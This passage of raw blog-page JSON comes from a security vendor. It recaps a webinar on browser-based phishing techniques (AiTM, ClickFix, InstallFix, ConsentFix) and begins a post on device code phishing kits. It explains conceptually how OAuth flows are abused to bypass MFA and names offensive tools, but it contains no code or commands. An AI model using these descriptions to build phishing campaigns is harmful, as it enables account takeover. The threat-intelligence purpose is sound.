internet\" before arriving at the credential-harvesting page. Push reconstructs these multi-hop chains into a ",{"data":12876,"content":12878,"nodeType":940},{"uri":12877},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fguide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks\u002F",[12879],{"data":12880,"marks":12881,"value":12882,"nodeType":883},{},[],"complete timeline",{"data":12884,"marks":12885,"value":12886,"nodeType":883},{},[],", mapping the full redirect sequence even when individual hops are through trusted domains that wouldn't trigger any reputation-based alert — and crucially, detects malicious content on the phishing page itself rather than relying on known-bad IP and domain based checks that can only see the known-good sites used early in the chain.",{"data":12888,"content":12889,"nodeType":905},{},[],{"data":12891,"content":12892,"nodeType":909},{},[12893],{"data":12894,"marks":12895,"value":12897,"nodeType":883},{},[12896],{"type":916},"3. Email is losing its market share as a delivery vector",{"data":12899,"content":12900,"nodeType":879},{},[12901,12905,12913],{"data":12902,"marks":12903,"value":12904,"nodeType":883},{},[],"One of the most striking examples in the webinar was a targeted AiTM campaign ",{"data":12906,"content":12908,"nodeType":940},{"uri":12907},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fnew-phishing-campaign-identified-targeting-linkedin-users\u002F",[12909],{"data":12910,"marks":12911,"value":12912,"nodeType":883},{},[],"Push detected last year",{"data":12914,"marks":12915,"value":12916,"nodeType":883},{},[]," that was delivered entirely via LinkedIn. Senior executives at tech companies received direct messages from compromised contacts — people they already knew, in some cases other employees of the same companies — offering involvement in private equity fundraising rounds connected to companies they had real involvement with. The targeting was precise and personal, and the redirect chain ran through sites.google.com and Microsoft Dynamics before landing on a cloned login page.",{"data":12918,"content":12919,"nodeType":879},{},[12920],{"data":12921,"marks":12922,"value":12923,"nodeType":883},{},[],"As Luke noted, LinkedIn occupies an unusual middle ground: \"It's this great way of targeting companies, but through a vector that can't really be monitored in the same way as other corporate systems, because it's kind of a personal platform.\" It's personal enough that companies can't realistically monitor it, but professional enough that employees routinely access it from corporate devices.",{"data":12925,"content":12926,"nodeType":879},{},[12927],{"data":12928,"marks":12929,"value":12930,"nodeType":883},{},[],"LinkedIn is only part of the shift. ClickFix attacks most commonly arrive via search results in 4 of 5 cases based on Push data. Luke noted \"not even malvertising, just organic search, uncovering legit websites that have been compromised.\" InstallFix pages appear as sponsored Google ads. ConsentFix pages were seeded on compromised websites found through normal browsing. In every case, the email gateway never sees the lure because the lure was never in an email. And of course, even if a compromised website is reported and removed, it’s easier than ever for an attacker to quickly tear down and rotate their sites to stay ahead of blocklists. ",{"data":12932,"content":12933,"nodeType":4197},{},[12934],{"data":12935,"content":12936,"nodeType":879},{},[12937],{"data":12938,"marks":12939,"value":12940,"nodeType":883},{},[],"As John put it: \"You could set up this lure or this trap out on the open internet so that anyone could fall for it at any point.\"",{"data":12942,"content":12943,"nodeType":905},{},[],{"data":12945,"content":12946,"nodeType":909},{},[12947],{"data":12948,"marks":12949,"value":12951,"nodeType":883},{},[12950],{"type":916},"4. ClickFix keeps evolving with multiple *Fix derivatives",{"data":12953,"content":12954,"nodeType":879},{},[12955,12959,12968,12972,12980],{"data":12956,"marks":12957,"value":12958,"nodeType":883},{},[],"ClickFix — where a malicious page silently writes a payload to the victim's clipboard and instructs them to paste and execute it — ",{"data":12960,"content":12962,"nodeType":940},{"uri":12961},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fintroducing-malicious-copy-paste-detection\u002F",[12963],{"data":12964,"marks":12965,"value":12967,"nodeType":883},{},[12966],{"type":948},"spawned an entire family of variants since its emergence, according to Push’s research",{"data":12969,"marks":12970,"value":12971,"nodeType":883},{},[],". The webinar showed how far the social engineering has come: Luke demonstrated a ",{"data":12973,"content":12975,"nodeType":940},{"uri":12974},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-most-advanced-clickfix-yet\u002F",[12976],{"data":12977,"marks":12978,"value":12979,"nodeType":883},{},[],"particularly sophisticated variant",{"data":12981,"marks":12982,"value":12983,"nodeType":883},{},[]," on a compromised legitimate website with an embedded instructional video and a countdown timer to manufacture urgency, targeting macOS. As John noted: \"It can be cross-platform because you're just preying on the human weakness. The video smooths it over for the user experience.\"",{"data":12985,"content":12986,"nodeType":879},{},[12987,12991,12998],{"data":12988,"marks":12989,"value":12990,"nodeType":883},{},[],"The more important point was structural. Because the user manually pastes and executes the command, \"from the EDR's perspective, the user just manually ran this command,\" Luke explained. \"It actually breaks that link from an EDR's perspective.\" EDR behavioral detections weigh execution context heavily — a PowerShell command spawned from a browser process tree is suspicious, but the same command initiated through the Run dialog looks like normal activity. Push ",{"data":12992,"content":12993,"nodeType":940},{"uri":12961},[12994],{"data":12995,"marks":12996,"value":12997,"nodeType":883},{},[],"detects ClickFix at the clipboard-injection stage",{"data":12999,"marks":13000,"value":13001,"nodeType":883},{},[],", before the payload ever reaches the endpoint, to bolster endpoint-level detections and extend protection to machines like BYOD, contractor, or developer devices where EDR is often missing or tuned-down.",{"data":13003,"content":13004,"nodeType":905},{},[],{"data":13006,"content":13007,"nodeType":909},{},[13008],{"data":13009,"marks":13010,"value":13012,"nodeType":883},{},[13011],{"type":916},"5. InstallFix turned the AI tool boom into an attack surface overnight",{"data":13014,"content":13015,"nodeType":879},{},[13016,13019,13026],{"data":13017,"marks":13018,"value":21,"nodeType":883},{},[],{"data":13020,"content":13021,"nodeType":940},{"uri":7409},[13022],{"data":13023,"marks":13024,"value":1826,"nodeType":883},{},[13025],{"type":948},{"data":13027,"marks":13028,"value":13029,"nodeType":883},{},[]," — a ClickFix variant that clones legitimate developer tool installation pages and swaps the install command for a malicious payload — was one of the clearest examples of how quickly a new attack pattern can go from zero to dominant. Luke showed side-by-side comparisons of real and fake Claude Code installation pages that were visually identical except for the payload itself, and fake Notebook LM pages appearing as top Google sponsored results.",{"data":13031,"content":13032,"nodeType":879},{},[13033],{"data":13034,"marks":13035,"value":13036,"nodeType":883},{},[],"The trajectory Luke described was striking: \"It literally started one day and then it's just been nonstop for the last couple of months since it started. It obviously is working really well.\" John added that the Claude Code variant in particular has been \"running rampant,\" and that he personally knows someone who fell for it.",{"data":13038,"content":13039,"nodeType":879},{},[13040],{"data":13041,"marks":13042,"value":13043,"nodeType":883},{},[],"What makes InstallFix effective is that it exploits a workflow that's become completely normalized — the rise of AI tools has encouraged even non-technical users to install software via terminal commands copied from documentation pages. When the fake page looks identical to the real one and the install method is exactly what you'd expect, the only tell is a base64-encoded payload that most users wouldn't think to scrutinize.",{"data":13045,"content":13046,"nodeType":905},{},[],{"data":13048,"content":13049,"nodeType":909},{},[13050],{"data":13051,"marks":13052,"value":13054,"nodeType":883},{},[13053],{"type":916},"6. ConsentFix plays out entirely in the browser, and criminals just got the playbook",{"data":13056,"content":13057,"nodeType":879},{},[13058,13061,13068],{"data":13059,"marks":13060,"value":21,"nodeType":883},{},[],{"data":13062,"content":13063,"nodeType":940},{"uri":1331},[13064],{"data":13065,"marks":13066,"value":1321,"nodeType":883},{},[13067],{"type":948},{"data":13069,"marks":13070,"value":13071,"nodeType":883},{},[]," was a key focus in the webinar, and for good reason — it represents a fundamentally different class of browser attack. Rather than proxying credentials (AiTM) or injecting endpoint payloads (ClickFix), ConsentFix abuses the OAuth authorization code flow via the Azure CLI's localhost redirect to obtain access tokens without ever touching a password or MFA prompt. As John put it: \"This one is really tricky because the entire attack and technique lives only within the browser. There are no little EDR artifacts to poke and play at.\"",{"data":13073,"content":13074,"nodeType":879},{},[13075],{"data":13076,"marks":13077,"value":13078,"nodeType":883},{},[],"Luke described how Push first detected ConsentFix in the wild — a genuine zero-day discovery that took multiple encounters to fully understand. The attackers were fingerprinting visitors by IP and browser, triggering the payload only once per visitor across all compromised sites, and performing conditional access checks on the email address provided before deciding whether to proceed. \"It took us seeing it a few times before we cracked it,\" Luke explained. \"And then we were like — wow. What is this? I've never seen this before.\"",{"data":13080,"content":13081,"nodeType":879},{},[13082,13086,13093],{"data":13083,"marks":13084,"value":13085,"nodeType":883},{},[],"The session then took an interesting turn when John revealed something he hadn't previously shared publicly: a  ",{"data":13087,"content":13088,"nodeType":940},{"uri":1343},[13089],{"data":13090,"marks":13091,"value":13092,"nodeType":883},{},[],"ConsentFix v3 toolkit",{"data":13094,"marks":13095,"value":13096,"nodeType":883},{},[]," posted on a well-known criminal forum, complete with a tutorial video, step-by-step instructions, and a zero-infrastructure approach using Cloudflare Workers for hosting, Dropbox for PDF delivery, and Pipedream as an automated exfiltration channel. \"They don’t need any infrastructure,\" John noted. \"They don’t have to host any servers or VPS. They could just cast this out to the whole wide world on the open internet.\"",{"data":13098,"content":13099,"nodeType":4197},{},[13100],{"data":13101,"content":13102,"nodeType":879},{},[13103],{"data":13104,"marks":13105,"value":13106,"nodeType":883},{},[],"Luke's assessment was clear: \"When we published our first article, we were thinking, surely we're going to see a huge increase in this technique. We haven't really — until now.\" ",{"data":13108,"content":13109,"nodeType":879},{},[13110],{"data":13111,"marks":13112,"value":13113,"nodeType":883},{},[],"With the criminal ecosystem now tooled up, the expectation is that ConsentFix will follow the same commoditization arc as other techniques discussed in the session.",{"data":13115,"content":13116,"nodeType":905},{},[],{"data":13118,"content":13119,"nodeType":909},{},[13120],{"data":13121,"marks":13122,"value":13124,"nodeType":883},{},[13123],{"type":916},"7. Device code phishing is the technique both speakers fear most (and it's just getting started)",{"data":13126,"content":13127,"nodeType":879},{},[13128,13132,13138],{"data":13129,"marks":13130,"value":13131,"nodeType":883},{},[],"When John asked Luke which technique felt most dangerous, the answer was immediate: ",{"data":13133,"content":13134,"nodeType":940},{"uri":2443},[13135],{"data":13136,"marks":13137,"value":2195,"nodeType":883},{},[],{"data":13139,"marks":13140,"value":3386,"nodeType":883},{},[],{"data":13142,"content":13143,"nodeType":879},{},[13144],{"data":13145,"marks":13146,"value":13147,"nodeType":883},{},[],"The technique abuses the OAuth 2.0 device authorization grant flow — originally designed for input-constrained devices like TVs, but now primarily used in enterprise environments for CLI tool authentication (Azure CLI, GitHub CLI, AWS CLI). That everyday enterprise usage is exactly what makes the phishing so effective: users in developer-heavy organizations are already habituated to entering short codes as part of their normal workflow. The victim enters a code on a legitimate Microsoft login page, and if they're already authenticated, the entire compromise happens without entering a password or completing an MFA challenge.",{"data":13149,"content":13150,"nodeType":879},{},[13151],{"data":13152,"marks":13153,"value":13154,"nodeType":883},{},[],"Push is now tracking at least 12 distinct device code phishing kits, \"literally within the last couple of months — from basically zero to this.\" EvilTokens dominates at an estimated 90–95% of detected volume, but the kit landscape is diversifying fast. Luke's theory: every existing AiTM vendor is adding device code phishing as a module. When Push investigated the Venom kit, its AiTM component triggered existing Sneaky2FA detections — suggesting the same actors or codebase behind both. \"That's why we've seen such a rapid increase — it's worked so well that everyone is just doing the same thing now.\"",{"data":13156,"content":13157,"nodeType":879},{},[13158,13163],{"data":13159,"marks":13160,"value":13162,"nodeType":883},{},[13161],{"type":916},"What makes device code phishing uniquely dangerous is how little friction it presents to the victim.",{"data":13164,"marks":13165,"value":13166,"nodeType":883},{},[]," As Luke explained: \"It's purely identity-driven. It completely bypasses 2FA, even bypasses phishing-resistant factors like passkeys. And it's just not something that seems malicious to your average user. We haven't trained people to worry about being given a code and being told to type that code.\"",{"data":13168,"content":13169,"nodeType":4197},{},[13170],{"data":13171,"content":13172,"nodeType":879},{},[13173],{"data":13174,"marks":13175,"value":13176,"nodeType":883},{},[],"John's closing take: \"It still feels early and emergent, even though the technique has been known for a while. It hasn't been weaponized like it has right now. I think device code is just at the starting gun.\" ",{"data":13178,"content":13179,"nodeType":879},{},[13180,13184,13192],{"data":13181,"marks":13182,"value":13183,"nodeType":883},{},[],"The blast radius extends beyond Microsoft too — GitHub, Salesforce, and other platforms support the same underlying flow, and was exploited in 2025’s massive Salesforce campaign operated by ",{"data":13185,"content":13187,"nodeType":940},{"uri":13186},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fanalyzing-the-instructure-breach\u002F",[13188],{"data":13189,"marks":13190,"value":3504,"nodeType":883},{},[13191],{"type":948},{"data":13193,"marks":13194,"value":1350,"nodeType":883},{},[],{"data":13196,"content":13197,"nodeType":905},{},[],{"data":13199,"content":13200,"nodeType":909},{},[13201],{"data":13202,"marks":13203,"value":13205,"nodeType":883},{},[13204],{"type":916},"What ties all of this together",{"data":13207,"content":13208,"nodeType":879},{},[13209],{"data":13210,"marks":13211,"value":13212,"nodeType":883},{},[],"Every technique covered in the webinar — AiTM, ClickFix, InstallFix, ConsentFix, device code phishing — is designed to operate in or through the browser, abuse legitimate infrastructure and authentication flows, and evade the traditional security stack. Email gateways don't see them because the delivery vector increasingly isn't email. EDR doesn't reliably block them because the attack either breaks the process tree attribution (ClickFix) or never touches the endpoint at all (ConsentFix, device code phishing). Network proxies don't see them because the attack plays out in client-side page content, DOM interactions, and OAuth flows that are invisible to traffic inspection.",{"data":13214,"content":13215,"nodeType":879},{},[13216,13220,13226,13229,13236,13239,13246,13250,13257],{"data":13217,"marks":13218,"value":13219,"nodeType":883},{},[],"Push detects all of them — ",{"data":13221,"content":13222,"nodeType":940},{"uri":12877},[13223],{"data":13224,"marks":13225,"value":262,"nodeType":883},{},[],{"data":13227,"marks":13228,"value":12833,"nodeType":883},{},[],{"data":13230,"content":13231,"nodeType":940},{"uri":12961},[13232],{"data":13233,"marks":13234,"value":13235,"nodeType":883},{},[]," ClickFix and the *Fix family",{"data":13237,"marks":13238,"value":12833,"nodeType":883},{},[],{"data":13240,"content":13241,"nodeType":940},{"uri":1331},[13242],{"data":13243,"marks":13244,"value":13245,"nodeType":883},{},[]," ConsentFix",{"data":13247,"marks":13248,"value":13249,"nodeType":883},{},[],", and",{"data":13251,"content":13252,"nodeType":940},{"uri":2443},[13253],{"data":13254,"marks":13255,"value":13256,"nodeType":883},{},[]," device code phishing",{"data":13258,"marks":13259,"value":13260,"nodeType":883},{},[]," — through behavioral detection at the browser layer, regardless of delivery channel, domain reputation, or infrastructure rotation. The detections target technique-class behaviors rather than specific kits or indicators, which is why Push detected ConsentFix as a zero-day and why new kit variants are typically caught by existing detection logic before a kit-specific rule is even written.",{"data":13262,"content":13263,"nodeType":879},{},[13264,13267,13276,13280,13286],{"data":13265,"marks":13266,"value":21,"nodeType":883},{},[],{"data":13268,"content":13270,"nodeType":940},{"uri":13269},"https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fbrowser-attacks-why-browser-new-battleground",[13271],{"data":13272,"marks":13273,"value":13275,"nodeType":883},{},[13274],{"type":948},"Watch the full webinar",{"data":13277,"marks":13278,"value":13279,"nodeType":883},{},[]," to see the demos, attack chain timelines, and in-the-wild examples discussed in this post — or ",{"data":13281,"content":13282,"nodeType":940},{"uri":4772},[13283],{"data":13284,"marks":13285,"value":7109,"nodeType":883},{},[],{"data":13287,"marks":13288,"value":13289,"nodeType":883},{},[]," to see how Push handles them.",{"entries":13291},{"hyperlink":13292,"inline":13293,"block":13294},[],[],[13295],{"sys":13296,"__typename":13297,"type":13298,"ctaText":13299,"buttonLabel":13300,"buttonColour":13301,"buttonUrl":13269},{"id":12734},"CtaWidget","Custom","Watch the full webinar on demand.","Watch now","sunny orange",{"items":13303},[],{},"7 things we learned from our conversation with John Hammond","2026-05-19T00:00:00.000Z",{"items":13308},[13309,16312,17033],{"__typename":1967,"sys":13310,"content":13312,"title":16299,"synopsis":16300,"hashTags":59,"publishedDate":16301,"slug":362,"tagsCollection":16302,"authorsCollection":16308},{"id":13311},"5DmCqTU2Tg4adYScA5vT2x",{"json":13313},{"data":13314,"content":13315,"nodeType":875},{},[13316,13322,13342,13360,13367,13373,13380,13387,13390,13398,13404,13488,13507,13513,13520,13634,13640,13643,13651,13658,13664,13667,13675,13716,13722,13729,13736,13743,13750,13769,13775,13781,13787,13793,13799,13805,13811,13817,14080,14083,14091,14226,14232,14235,14243,14282,14416,14422,14425,14433,14580,14586,14589,14597,14603,14744,14750,14756,14759,14767,14914,14920,14923,14931,15077,15083,15086,15094,15189,15195,15198,15206,15300,15306,15309,15317,15323,15456,15462,15465,15473,15522,15528,15531,15539,15678,15683,15686,15694,15826,15832,15835,15843,15855,15862,15868,15874,15881,15902,15918,15924,15927,15935,15943,15964,15985,15990,15997,16004,16012,16019,16026,16033,16041,16048,16098,16104,16107,16115,16122,16129,16176,16182,16189,16192,16200,16207,16214,16234,16240,16247,16254,16261],{"data":13317,"content":13321,"nodeType":971},{"target":13318},{"sys":13319},{"id":13320,"type":976,"linkType":977},"XOFOeNqmRHeiRbkPOJrP1",[],{"data":13323,"content":13324,"nodeType":879},{},[13325,13329,13338],{"data":13326,"marks":13327,"value":13328,"nodeType":883},{},[],"The OAuth 2.0 ",{"data":13330,"content":13332,"nodeType":940},{"uri":13331},"https:\u002F\u002Fwww.rfc-editor.org\u002Frfc\u002Frfc8628",[13333],{"data":13334,"marks":13335,"value":13337,"nodeType":883},{},[13336],{"type":948},"device authorization grant",{"data":13339,"marks":13340,"value":13341,"nodeType":883},{},[]," was designed to enable input-constrained devices to sign-in to apps by asking the user to complete the login on a separate device by entering a code. But today, it’s mainly used when accessing CLI tools, meaning that many users encounter the device code flow daily. ",{"data":13343,"content":13344,"nodeType":879},{},[13345,13348,13356],{"data":13346,"marks":13347,"value":21,"nodeType":883},{},[],{"data":13349,"content":13351,"nodeType":940},{"uri":13350},"https:\u002F\u002Fgithub.com\u002Fpushsecurity\u002Fsaas-attacks\u002Fblob\u002Fmain\u002Ftechniques\u002Fdevice_code_phishing\u002Fdescription.md",[13352],{"data":13353,"marks":13354,"value":361,"nodeType":883},{},[13355],{"type":948},{"data":13357,"marks":13358,"value":13359,"nodeType":883},{},[]," attacks designed to exploit this authorization flow are not new — it was among the first techniques that we added to the SaaS attacks matrix back in 2023. But it’s taken until now for it to really enter mainstream adoption. ",{"data":13361,"content":13362,"nodeType":879},{},[13363],{"data":13364,"marks":13365,"value":13366,"nodeType":883},{},[],"The technique tricks a user into issuing access tokens for an attacker-controlled application (not a device, confusingly). Any app that supports device code logins can be a target. Popular examples include Microsoft, Google, Salesforce, GitHub, and AWS. That said, Microsoft is, as always, much more heavily targeted at scale now than any other app.",{"data":13368,"content":13372,"nodeType":971},{"target":13369},{"sys":13370},{"id":13371,"type":976,"linkType":977},"Al0pGH8vmOYiufDFiAbt0",[],{"data":13374,"content":13375,"nodeType":879},{},[13376],{"data":13377,"marks":13378,"value":13379,"nodeType":883},{},[],"We’ve always been surprised that attackers haven’t commonly used device code phishing in their standard toolkit, preferring session-stealing AITM phishing and other social engineering attacks like ClickFix. But it’s pretty clear from the recent data that the shift to mainstream adoption has now happened. ",{"data":13381,"content":13382,"nodeType":879},{},[13383],{"data":13384,"marks":13385,"value":13386,"nodeType":883},{},[],"In this blog post, we’ll explore the history of device code phishing, what’s changed for it to enter mainstream adoption, how it works under the hood (with recent examples), and what security teams can do about it. ",{"data":13388,"content":13389,"nodeType":905},{},[],{"data":13391,"content":13392,"nodeType":909},{},[13393],{"data":13394,"marks":13395,"value":13397,"nodeType":883},{},[13396],{"type":916},"A brief history of device code phishing",{"data":13399,"content":13403,"nodeType":971},{"target":13400},{"sys":13401},{"id":13402,"type":976,"linkType":977},"6u3DgvSGChtTJu7l9I7PG1",[],{"data":13405,"content":13406,"nodeType":879},{},[13407,13411,13420,13424,13433,13437,13446,13450,13459,13463,13472,13475,13484],{"data":13408,"marks":13409,"value":13410,"nodeType":883},{},[],"The technique was first documented in 2020, before Secureworks released the first tooling framework ",{"data":13412,"content":13414,"nodeType":940},{"uri":13413},"https:\u002F\u002Fgithub.com\u002Fsecureworks\u002FPhishInSuits",[13415],{"data":13416,"marks":13417,"value":13419,"nodeType":883},{},[13418],{"type":948},"PhishInSuits",{"data":13421,"marks":13422,"value":13423,"nodeType":883},{},[]," a year later. A host of research followed, including ",{"data":13425,"content":13427,"nodeType":940},{"uri":13426},"https:\u002F\u002Fgithub.com\u002Fsecureworks\u002Fsquarephish",[13428],{"data":13429,"marks":13430,"value":13432,"nodeType":883},{},[13431],{"type":948},"SquarePhish",{"data":13434,"marks":13435,"value":13436,"nodeType":883},{},[]," v1 (using QR codes to trigger the 15 minute code expiration window), Dirk-Jan Mollema’s ",{"data":13438,"content":13440,"nodeType":940},{"uri":13439},"https:\u002F\u002Fdirkjanm.io\u002Fphishing-for-microsoft-entra-primary-refresh-tokens\u002F",[13441],{"data":13442,"marks":13443,"value":13445,"nodeType":883},{},[13444],{"type":948},"key research",{"data":13447,"marks":13448,"value":13449,"nodeType":883},{},[]," (chaining device code phishing via Microsoft apps into Primary Refresh Token (PRT) acquisition to gain full browser-level access) and Dennis Kniep’s ",{"data":13451,"content":13453,"nodeType":940},{"uri":13452},"https:\u002F\u002Fgithub.com\u002Fdenniskniep\u002FDeviceCodePhishing",[13454],{"data":13455,"marks":13456,"value":13458,"nodeType":883},{},[13457],{"type":948},"DeviceCodePhishing tool",{"data":13460,"marks":13461,"value":13462,"nodeType":883},{},[]," which automates the entire flow with a headless browser. (Other recent noteworthy tools include ",{"data":13464,"content":13466,"nodeType":940},{"uri":13465},"https:\u002F\u002Fgithub.com\u002Fnromsdahl\u002Fsquarephish2",[13467],{"data":13468,"marks":13469,"value":13471,"nodeType":883},{},[13470],{"type":948},"SquarePhish2",{"data":13473,"marks":13474,"value":3983,"nodeType":883},{},[],{"data":13476,"content":13478,"nodeType":940},{"uri":13477},"https:\u002F\u002Fgithub.com\u002Fpraetorian-inc\u002FGitPhish",[13479],{"data":13480,"marks":13481,"value":13483,"nodeType":883},{},[13482],{"type":948},"GitPhish",{"data":13485,"marks":13486,"value":13487,"nodeType":883},{},[],", so shout out to those too). ",{"data":13489,"content":13490,"nodeType":879},{},[13491,13495,13503],{"data":13492,"marks":13493,"value":13494,"nodeType":883},{},[],"It wasn’t until August 2024 that in-the-wild exploitation was first identified, with Russia-linked campaigns then continuing into 2025 before entering mainstream criminal adoption. This trend has continued to gather momentum in 2026 with ",{"data":13496,"content":13498,"nodeType":940},{"uri":13497},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F03\u002Fdevice-code-phishing-hits-340-microsoft.html",[13499],{"data":13500,"marks":13501,"value":2392,"nodeType":883},{},[13502],{"type":948},{"data":13504,"marks":13505,"value":13506,"nodeType":883},{},[],", the first reported criminal PhaaS kit for device code phishing, already powering massive campaigns after launching in February. ",{"data":13508,"content":13512,"nodeType":971},{"target":13509},{"sys":13510},{"id":13511,"type":976,"linkType":977},"6xsfmbYEzpW7CdDiNzO6cu",[],{"data":13514,"content":13515,"nodeType":879},{},[13516],{"data":13517,"marks":13518,"value":13519,"nodeType":883},{},[],"Some of the noteworthy in-the-wild campaigns include:",{"data":13521,"content":13522,"nodeType":1531},{},[13523,13555,13575],{"data":13524,"content":13525,"nodeType":1535},{},[13526],{"data":13527,"content":13528,"nodeType":879},{},[13529,13533,13540,13543,13551],{"data":13530,"marks":13531,"value":13532,"nodeType":883},{},[],"Storm-2372, tracked by ",{"data":13534,"content":13535,"nodeType":940},{"uri":2375},[13536],{"data":13537,"marks":13538,"value":13539,"nodeType":883},{},[],"Microsoft",{"data":13541,"marks":13542,"value":3983,"nodeType":883},{},[],{"data":13544,"content":13546,"nodeType":940},{"uri":13545},"https:\u002F\u002Fwww.volexity.com\u002Fblog\u002F2025\u002F02\u002F13\u002Fmultiple-russian-threat-actors-targeting-microsoft-device-code-authentication\u002F",[13547],{"data":13548,"marks":13549,"value":13550,"nodeType":883},{},[],"Volexity",{"data":13552,"marks":13553,"value":13554,"nodeType":883},{},[],", linked to multiple Russia-aligned clusters, combining spear-phishing and social engineering with device code phishing payloads against strategic intelligence targets.",{"data":13556,"content":13557,"nodeType":1535},{},[13558],{"data":13559,"content":13560,"nodeType":879},{},[13561,13565,13571],{"data":13562,"marks":13563,"value":13564,"nodeType":883},{},[],"The massive Salesforce campaign operated by ",{"data":13566,"content":13567,"nodeType":940},{"uri":7618},[13568],{"data":13569,"marks":13570,"value":2006,"nodeType":883},{},[],{"data":13572,"marks":13573,"value":13574,"nodeType":883},{},[]," (SLH) combined vishing with a device code phishing payload targeting Salesforce. The attacks morphed into a broader supply chain campaign using stolen credentials, ultimately resulting in 1000+ organizations being compromised and over 1.5 billion stolen records claimed. ",{"data":13576,"content":13577,"nodeType":1535},{},[13578],{"data":13579,"content":13580,"nodeType":879},{},[13581,13585,13593,13597,13606,13609,13618,13622,13630],{"data":13582,"marks":13583,"value":13584,"nodeType":883},{},[],"A massive spike in activity in late 2025 and 2026. This includes ",{"data":13586,"content":13588,"nodeType":940},{"uri":13587},"https:\u002F\u002Fwww.proofpoint.com\u002Fus\u002Fblog\u002Fthreat-insight\u002Faccess-granted-phishing-device-code-authorization-account-takeover",[13589],{"data":13590,"marks":13591,"value":13592,"nodeType":883},{},[],"multiple threat clusters",{"data":13594,"marks":13595,"value":13596,"nodeType":883},{},[]," tracked using device code phishing techniques, more ",{"data":13598,"content":13600,"nodeType":940},{"uri":13599},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks\u002F",[13601],{"data":13602,"marks":13603,"value":13605,"nodeType":883},{},[13604],{"type":948},"criminal operations linked to SLH",{"data":13607,"marks":13608,"value":6198,"nodeType":883},{},[],{"data":13610,"content":13612,"nodeType":940},{"uri":13611},"https:\u002F\u002Fnewtonpaul.com\u002Fblog\u002Fdevice-code-phish-update\u002F",[13613],{"data":13614,"marks":13615,"value":13617,"nodeType":883},{},[13616],{"type":948},"hundreds of organizations being targeted via PhaaS architecture,",{"data":13619,"marks":13620,"value":13621,"nodeType":883},{},[]," which looks to be the same campaign as the recently uncovered EvilTokens PhaaS reported by ",{"data":13623,"content":13624,"nodeType":940},{"uri":2990},[13625],{"data":13626,"marks":13627,"value":13629,"nodeType":883},{},[13628],{"type":948},"Huntress",{"data":13631,"marks":13632,"value":13633,"nodeType":883},{},[]," (featuring abuse of the Railway PaaS platform). ",{"data":13635,"content":13639,"nodeType":971},{"target":13636},{"sys":13637},{"id":13638,"type":976,"linkType":977},"3WLt6qLCK8CSwr0QZxZiMv",[],{"data":13641,"content":13642,"nodeType":905},{},[],{"data":13644,"content":13645,"nodeType":909},{},[13646],{"data":13647,"marks":13648,"value":13650,"nodeType":883},{},[13649],{"type":916},"What we’re seeing in the wild",{"data":13652,"content":13653,"nodeType":879},{},[13654],{"data":13655,"marks":13656,"value":13657,"nodeType":883},{},[],"As mentioned, we’ve also seen a huge spike in device code phishing activity this year, with multiple kits, page designs, and lure types. We’ve now identified 14+ distinct kits in circulation in the wild, with EvilTokens being the most prevalent. It’s clear that attackers are both spinning up their own kits and creative derivatives of others — we’ve seen kits that are visually similar to EvilTokens (close enough to be clones or forks) but with very different backends, for example AWS, Digital Ocean, 2cloud, and more. ",{"data":13659,"content":13663,"nodeType":971},{"target":13660},{"sys":13661},{"id":13662,"type":976,"linkType":977},"nJCbTw85GKXdqrlIkzZwi",[],{"data":13665,"content":13666,"nodeType":905},{},[],{"data":13668,"content":13669,"nodeType":1036},{},[13670],{"data":13671,"marks":13672,"value":13674,"nodeType":883},{},[13673],{"type":916},"“ANTIBOT” (EvilTokens)",{"data":13676,"content":13677,"nodeType":879},{},[13678,13681,13688,13691,13700,13704,13712],{"data":13679,"marks":13680,"value":21,"nodeType":883},{},[],{"data":13682,"content":13683,"nodeType":940},{"uri":2990},[13684],{"data":13685,"marks":13686,"value":13629,"nodeType":883},{},[13687],{"type":948},{"data":13689,"marks":13690,"value":2524,"nodeType":883},{},[],{"data":13692,"content":13694,"nodeType":940},{"uri":13693},"https:\u002F\u002Fblog.sekoia.io\u002Fnew-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1\u002F",[13695],{"data":13696,"marks":13697,"value":13699,"nodeType":883},{},[13698],{"type":948},"Sekoia",{"data":13701,"marks":13702,"value":13703,"nodeType":883},{},[],", and researcher ",{"data":13705,"content":13706,"nodeType":940},{"uri":13611},[13707],{"data":13708,"marks":13709,"value":13711,"nodeType":883},{},[13710],{"type":948},"Paul Newton",{"data":13713,"marks":13714,"value":13715,"nodeType":883},{},[]," have already done a great job of providing IOCs for the recent EvilTokens activity spike, including multiple backend Railway IPs in authentication events. ",{"data":13717,"content":13721,"nodeType":971},{"target":13718},{"sys":13719},{"id":13720,"type":976,"linkType":977},"1XNviq5OvMf5TEAc59F6g5",[],{"data":13723,"content":13724,"nodeType":879},{},[13725],{"data":13726,"marks":13727,"value":13728,"nodeType":883},{},[],"Beyond the most widely observed implementation featuring a Cloudflare Workers frontend and Railway backend for authentication, we’ve also tracked additional versions of EvilTokens in circulation since January 2026 (many of which remain live along with the current “production” version of the kit). ",{"data":13730,"content":13731,"nodeType":879},{},[13732],{"data":13733,"marks":13734,"value":13735,"nodeType":883},{},[],"You can see an evolution of the kit in the videos and screenshots below, from early precursors seen in mid-January, the first mentions of ANTIBOT in the page code in late-January, the parallel development of a “Courts Access” fork that lacks the ANTIBOT references, and finally production EvilTokens in February. One of the key threads between the versions is the presence of a generateFallbackCode() JS function and use of a \u002Fgenerate-codes API call. ",{"data":13737,"content":13738,"nodeType":879},{},[13739],{"data":13740,"marks":13741,"value":13742,"nodeType":883},{},[],"Early implementations were quite different, for example using ScrapingBee to generate the displayed code, and varied hosting on vercel, fastly, edgeone, and others. ",{"data":13744,"content":13745,"nodeType":879},{},[13746],{"data":13747,"marks":13748,"value":13749,"nodeType":883},{},[],"After initially appearing on custom domains, the production version is now predominantly hosted on Cloudflare Workers, as per the broader tracking of the campaign. The descriptive HTML comments around ANTIBOT functions have also been removed in later versions. ",{"data":13751,"content":13752,"nodeType":879},{},[13753,13757,13765],{"data":13754,"marks":13755,"value":13756,"nodeType":883},{},[],"The production version of EvilTokens showcases common 